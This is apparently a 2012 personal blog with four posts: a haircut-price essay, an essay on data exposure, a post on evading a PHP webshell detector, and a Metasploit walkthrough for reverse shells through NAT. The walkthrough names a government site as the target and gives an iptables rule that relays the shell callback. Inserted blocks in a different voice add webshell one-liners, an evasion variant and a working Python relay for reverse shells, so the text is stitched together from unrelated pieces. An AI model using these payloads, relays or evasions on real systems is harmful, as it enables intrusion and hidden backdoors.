Saturday, September 29, 2012

Budget Gunting Rambut (Haircut Budget)

Budget, bonus, sugar, handphone, aid, the poor, billion, trillion, gazillion, free education blah blah blah, fuel subsidy blah blah blah, etc. etc. etc.

What do you get when you compare the BN budget and the PR budget?
Answer: it's the same regardless of which road you choose. Just plus or minus.


From the PPP of our GDP based on IndexMundi
http://www.indexmundi.com/malaysia/gdp_(purchasing_power_parity).html


The hidden law in economics is that everything is computable if you eliminate unnecessary human feelings toward any party. When you can compute it, that means there is a law that can be followed.


We've seen purchasing power parity rise steadily, at approximately 5% per year. There's a bit of a dip in 1999-2000 due to that depression period, but otherwise we see growth every year. Now some people say it's thanks to BN, Dr. M and blah blah blah that our PPP increased.
But from the law of exponential growth in economics:

And for the doubling time, where the growth reaches 100% of the initial sample:


And we can see it's true: in 14 years the growth goes beyond 100%.
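The doubling-time formula behind that 14-year figure, written out as an added worked equation (this is not the post's own missing figure; $P_0$, $r$ and $T$ are my symbols, with $r$ taken as the post's 5% annual growth):

$$
P(t) = P_0 (1+r)^t, \qquad P(T) = 2P_0 \;\Rightarrow\; (1+r)^T = 2 \;\Rightarrow\; T = \frac{\ln 2}{\ln(1+r)}
$$

With $r = 0.05$: $T = \ln 2 / \ln 1.05 \approx 0.693 / 0.0488 \approx 14.2$ years, which is also what the rule-of-70 shortcut gives, $70 / 5 = 14$.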


What does this statistic tell us? We spend a lot on doing regular things. Forget unhealthy stuff like (radiation from electronic devices and high-calorie food); take the haircut (gunting rambut) for example.
An average Joe (a decent Malaysian, not with coloured hair or long hair like Kage) spends an average of 15 minutes at a barber shop. Normal hair grows 1/2 inch per month, so for boys that means a haircut every 2 months; if you keep cutting your hair like you did in school, by 30 you should have had at least 138 haircuts (starting from age 7, 23 years at 6 cuts a year). Nevertheless, the price of a haircut increases exponentially with the same doubling time.


The current average haircut price in KL is RM10.
Time spent at the barber shop: 15 minutes, constant.

Do take note: unless some dystopian event is triggered, by the time Aalim's child is 7 years old, the price to cut his son's hair will be roughly RM15, and with two children, straight to RM30. Bwahahaha.

Sources: IndexMundi and some YouTube video. Don't care about the crappy grammar, I'm not a mat salleh (white guy).










Friday, September 21, 2012

There is no security.

The Scenario

Alice: Hi, I would like to make a booking reservation at your resort today.

Manager: Sure, but you need to send us a copy of the front/back of your credit card to tally it.

Alice: No way!! That's insecure.

Manager: Well, you could use our online booking system. It's encrypted with 2048-bit blah blah blah...

Alice: Cool, thanks man!!

Manager: No problem. Be sure not to give the details over public wifi and only use a trusted network when you use our system. Can't have people snooping on the traffic, eh?

Taking a classical approach to crypto: when Alice and the Manager want to exchange sensitive information...

what do they do? They push it through SSL or any other "state of the art" cryptographic transform (the post's "Z transform": a black box that scrambles on one side and unscrambles on the other). So, to simplify the process flow, we say that Alice views the data in unencrypted form, and so does the Manager, from the process-flow point of view.


So, in the genesis of the covert channel: in the beginning there is no security, and in the end there is no security. Now let us expand the diagram to cover what lies outside the process flow,



where the Reality Domain consists of the physical interactions and environment that Alice and the Manager encounter, with living or non-living beings, and the Logical Domain is the list of interactions that the application uses or encounters to view the data in its insecure (decrypted) form.

Suppose Alice is the owner of a credit/debit card. In one way or another, the Reality Domain that Alice may encounter is:

- Cashier
- Receptionist 
- Friends
- Family


While the Logical Domain can be narrowed down to 3 entities:

- Web Browser
- Email
- PDF output or PostScript dump (for printing/archive purposes)

For the Manager, the Reality Domain they will encounter is:

- Finance
- Clerk
- Auditor
- External booking information

While the Logical Domain can be narrowed down to 3 entities:


- Software viewing the customer data (probably Excel or a PDF form)
- Email
- PDF output or PostScript dump (for printing/archive purposes)


Notice that none of the interactions in the reality domain or the logical domain has any form of security at all: the value is in the clear at every one of them.

What is the implication of this? Suppose the Manager says to Finance, "we received this booking from Alice, here are her details, please process it and proceed with the payment". The instruction and the information are passed around in insecure form, regardless of whether that happens by electronic means such as email or verbally.

We spend a tremendous amount of money securing the process flow with a multitude of compliance requirements, and we often forget to look at what happens in the "event before the flow" and the "event after the flow":

  • Have we paid attention to the security of the interactions in both domains?
  • What is keeping our data safe from any entity in each domain?
  • Can an entity hop to, or mimic, another entity across domains?
In the lore of malware, we know that malware can hijack the processes/threads of other applications under certain circumstances (token privileges, the CreateRemoteThread() API, etc.).

In the lore of scam-ware, we know that a person can impersonate other people and retrieve data as long as they present the right persona.

In the lore of human brains, 99% of us cannot decrypt DES, even with a "constant key", in mere seconds; so the data has to be passed from one human to another in its original form (numbers, names, passwords).
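To make the "before the flow / after the flow" point concrete, here is an added example (my code, not part of the original post) that models the booking scenario as a data-flow graph: the entities from the two domain lists above are nodes, the hops between them are edges, and only the one browser-to-server hop is encrypted in transit. The node and channel names are constructed for the example. The first function walks the graph and reports which entities end up holding the card number in full; the second shows the only control that changes that answer, a transform at the server so that everything downstream receives a masked value.

```python
"""Where is the value viewable in the clear?  Added example, not from the post.

Nodes are the entities the post lists (Alice's and the Manager's reality and
logical domains); edges are the hops between them.  Only the 'tls' channel is
encrypted in transit, and that hides the value on the wire for one hop only:
every endpoint that receives the value holds it in the clear unless some node
transforms it (mask/tokenise) before forwarding.  All names are constructed.
"""
from collections import deque

# (source, sink, channel) -- constructed booking flow for the scenario
EDGES = [
    ("alice_browser", "booking_server", "tls"),      # the "2048-bit" hop
    ("booking_server", "alice_email", "email"),      # confirmation mail
    ("alice_email", "alice_pdf", "print"),           # archived receipt
    ("booking_server", "manager_sheet", "file"),     # Excel/PDF export
    ("manager_sheet", "manager", "screen"),
    ("manager", "clerk", "verbal"),
    ("manager", "finance", "verbal"),
    ("manager_sheet", "manager_email", "email"),
    ("manager_email", "finance", "email"),
    ("manager_sheet", "manager_pdf", "print"),
    ("manager_pdf", "auditor", "paper"),
]


def exposure(edges, source, transforms=None):
    """Map every node the value reaches to the form it holds: 'full' or 'masked'.

    A node listed in `transforms` with value 'mask' forwards only the masked
    form.  If a node is reachable by both a full and a masked path, 'full'
    wins (worst case).  Encryption in transit never changes the form.
    """
    transforms = transforms or {}
    seen = {source: "full"}
    queue = deque([source])
    while queue:
        node = queue.popleft()
        out = "masked" if transforms.get(node) == "mask" else seen[node]
        for src, dst, _channel in edges:
            if src != node:
                continue
            if dst not in seen or (seen[dst] == "masked" and out == "full"):
                seen[dst] = out
                queue.append(dst)
    return seen


def full_holders(edges, source, transforms=None):
    """Sorted list of nodes that end up holding the full (unmasked) value."""
    return sorted(n for n, f in exposure(edges, source, transforms).items()
                  if f == "full")


def plaintext_hops(edges):
    """Hops where the value is readable on the path itself, not only at the endpoints."""
    return [(s, d, c) for s, d, c in edges if c != "tls"]


if __name__ == "__main__":
    print("encrypted hops:", len(EDGES) - len(plaintext_hops(EDGES)), "of", len(EDGES))
    print("full PAN holders, no masking:", full_holders(EDGES, "alice_browser"))
    print("full PAN holders, server masks:",
          full_holders(EDGES, "alice_browser", {"booking_server": "mask"}))
```

Run as-is, the first list contains all eleven entities, which is the post's point: the 2048-bit hop protects one edge out of eleven. With the server masking before it forwards, only the browser and the server ever hold the full number, and every clerk, email, printout and auditor downstream gets the masked form.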

Conclusion:
The reality of security is broken wherever the data can be viewed in insecure form.
We are living in an insecure environment on a thin line of trust.





Tuesday, September 11, 2012

Bypass PHP Shell Detector: Poor Man Style

One thing I hate the most is people finding our backdoor. From xanda's blog I found out there's a project called phpshelldetect (PHP Shell Detector) to detect malicious PHP code.


Xanda wrote a good tutorial on how to bypass it on his site (web xanda).

Since it is signature based, as long as we can craft one of 101 signature-evasive variants of the same code, it will be bypassed.

Signature-based detection is bad and inefficient, but fast enough to eliminate 99% of the netizen population.


So how hard is it to bypass the detector? Not that hard at all, and no obfuscation required.







And it works like a charm...
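The post's own bypass was in the screenshots that have not survived, so here is an added example of the general mechanism (my code, not Shell Detector's, and the signature list is constructed and far shorter than a real tool's). A toy signature scanner flags `system(` in a one-line shell; the same shell with the function name split across two string literals and called through a variable has identical behaviour but matches nothing. The `normalize()` function shows the defender's side of the arms race: fold the literals and resolve the variable function, and the signature hits again. The two PHP samples are constructed for the example.

```python
"""Toy signature scanner for PHP webshells, plus a normaliser that undoes the
cheapest evasions.  Added example, not the Shell Detector project's code; the
signatures below are constructed and much shorter than a real tool's list.
"""
import re

SIGNATURES = {
    "system": re.compile(r"\bsystem\s*\("),
    "shell_exec": re.compile(r"\bshell_exec\s*\("),
    "eval_b64": re.compile(r"\beval\s*\(\s*base64_decode\s*\("),
}

# Constructed samples: same behaviour, different bytes.
PLAIN_SHELL = "<?php system($_GET['cmd']); ?>"
# No obfuscation library needed: split the name, call it through a variable.
SPLIT_SHELL = "<?php $f = 'sys' . 'tem'; $f($_GET['cmd']); ?>"


def scan(src):
    """Names of the signatures that match src, sorted (empty list means 'clean')."""
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(src))


_CONCAT = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")
_ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*'([^']*)'\s*;")


def normalize(src):
    """Fold 'sys'.'tem' into 'system' and rewrite $f(...) to system(...) when
    $f was assigned a single string literal.  Deliberately minimal: a real
    normaliser would also handle double quotes, chr(), str_rot13, base64, ...
    """
    prev = None
    while prev != src:                      # repeat: 'a'.'b'.'c' needs two passes
        prev = src
        src = _CONCAT.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), src)
    for var, value in _ASSIGN.findall(src):
        src = re.sub(re.escape(var) + r"\s*\(", lambda m, v=value: v + "(", src)
    return src


if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SHELL), ("split", SPLIT_SHELL)):
        print(label, "raw:", scan(sample), "normalised:", scan(normalize(sample)))
```

The lesson cuts both ways: every evasion here is a few characters of PHP, and every counter is a few lines of regex, so a signature list is only ever as good as the normalisation that runs before it.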



Lalala

Wednesday, September 5, 2012

Art of Pentesting: NAT to NAT attack with metasploit

As followers of the "the only way to exploit is Metasploit" school, we often encounter situations where most servers are behind NAT. For the exploited server to connect back to the attacker machine successfully, the typical pentest workaround is to force the exploited server to make a reverse_tcp payload connection back to the attacker machine.





However, this technique has several weaknesses:

- The attacker needs to have an external IP.
- The attacker is in trouble if he is also in a NAT environment.
- The attacker's network has limited open ports.

A messed-up situation.

Solving the issue can be done in two ways:

1. Tinkering with your company policy to allow port forwarding to the internal IP.
2. Using a box with an external IP as a trampoline point into our internal network.



We use an external box as our trampoline point. You could install Metasploit on that server, but that may violate blah blah blah policy, plus it consumes a lot of resources.


P.O.C. of the attack


Suppose we found the CFM FCKeditor bug on chaah.gov.my; we can deploy the exploit as-is.






But the tricky part is the payload settings. On my setup I have this type of connection.

My setup:

1. Set up a VPN (or a poor man's VPN) on your external box.
2. Redirect traffic for one port on the external box to your own internal VPN IP:port.
3. Exploit.


Setting up the Metasploit payload:




On your external box you can use iptables to redirect the traffic:

 iptables -t nat -A PREROUTING -p tcp --dport 6767 -j DNAT --to-destination 192.168.6.14:6767   (192.168.6.14 being the VPN IP of the owned interface, i.e. your side of the tunnel)

Note that DNAT only rewrites the destination address. For the forwarded packets to reach the tunnel and for the replies to come back the same way, the external box also needs IP forwarding enabled (net.ipv4.ip_forward = 1), a FORWARD rule that accepts the traffic, and a POSTROUTING MASQUERADE (or SNAT) rule on the tunnel interface; without the source rewrite, the VPN client answers via its own default route and the target's TCP handshake never completes.
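When the external box cannot do kernel NAT for you (no root, no ip_forward, or a hosting policy that forbids it), the same trampoline can be a plain userspace relay. The following is an added example (my code, not the post's or Metasploit's): it accepts on the external box's public port and pipes every connection to the Metasploit handler bound on the VPN IP, exactly what the DNAT rule does but in a process you can run as an unprivileged user. The addresses in the comments are placeholders for the post's 6767 / 192.168.6.14 setup, and `echo_roundtrip()` exercises the whole relay on loopback with a constructed echo server standing in for the handler, so it can be tried without a VPN.

```python
"""Userspace TCP trampoline: accept on the external box, pipe each connection
to the listener on the attacker's VPN IP.  Added example, not from the post;
use it where the iptables DNAT rule is not an option.  Addresses in comments
are placeholders; echo_roundtrip() runs everything on loopback.
"""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(65536)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client, target):
    """Bridge one accepted connection to a fresh connection to target=(host, port)."""
    try:
        upstream = socket.create_connection(target)
    except OSError:
        client.close()                      # handler not up: drop the caller
        return
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_trampoline(listen_host, listen_port, target):
    """Bind listen_host:listen_port (0 = pick a free port), serve in a daemon
    thread, and return the port actually bound."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            conn, _peer = srv.accept()
            threading.Thread(target=_relay, args=(conn, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def _echo_once(srv):
    """Constructed stand-in for the VPN-side handler: echo one connection."""
    conn, _ = srv.accept()
    with conn:
        while True:
            data = conn.recv(65536)
            if not data:
                break
            conn.sendall(data)


def echo_roundtrip(payload):
    """Loopback self-test: client -> trampoline -> echo server; return what came back."""
    echo = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    echo.bind(("127.0.0.1", 0))
    echo.listen(1)
    threading.Thread(target=_echo_once, args=(echo,), daemon=True).start()
    port = start_trampoline("127.0.0.1", 0, ("127.0.0.1", echo.getsockname()[1]))
    out = b""
    with socket.create_connection(("127.0.0.1", port)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        while True:
            chunk = c.recv(65536)
            if not chunk:
                break
            out += chunk
    return out


if __name__ == "__main__":
    # Real use on the external box (placeholder values from the post's setup):
    # start_trampoline("0.0.0.0", 6767, ("192.168.6.14", 6767)); threading.Event().wait()
    print(echo_roundtrip(b"ping from target"))
```

Because the relay terminates the target's TCP connection itself, the reply path problem that DNAT has does not arise: the target only ever talks to the external box, and the external box opens its own connection over the tunnel. The price is that the handler sees the relay's VPN address, not the target's, as the peer.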




Back to Metasploit, here is the crown jewel: we set ReverseListenerBindAddress to our own VPN IP (LHOST stays the external box's public IP, which is what the target connects to).


.... And the ritual begins.